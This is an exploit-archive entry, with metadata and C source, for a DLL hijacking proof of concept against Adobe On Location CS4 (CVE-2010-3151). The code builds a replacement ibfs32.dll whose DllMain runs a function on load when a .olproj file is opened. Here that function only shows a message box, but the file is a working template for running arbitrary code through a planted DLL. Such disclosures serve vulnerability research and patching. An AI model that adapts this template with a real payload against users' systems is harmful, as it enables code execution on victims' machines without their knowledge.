EXPLOITS

Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking

Author: Glafkos Charalambous
type: local
platform: windows
port: 
date_added: 2010-08-25  
date_updated: 2010-08-25  
verified: 0  
codes: CVE-2010-3151;OSVDB-67562  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 14772.c  

/*
Exploit Title: Adobe On Location CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 Build 315
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .olproj
Greetz: Astalavista, OffSEC, Exploit-DB
*/


#include <windows.h>

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		dll_hijack();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}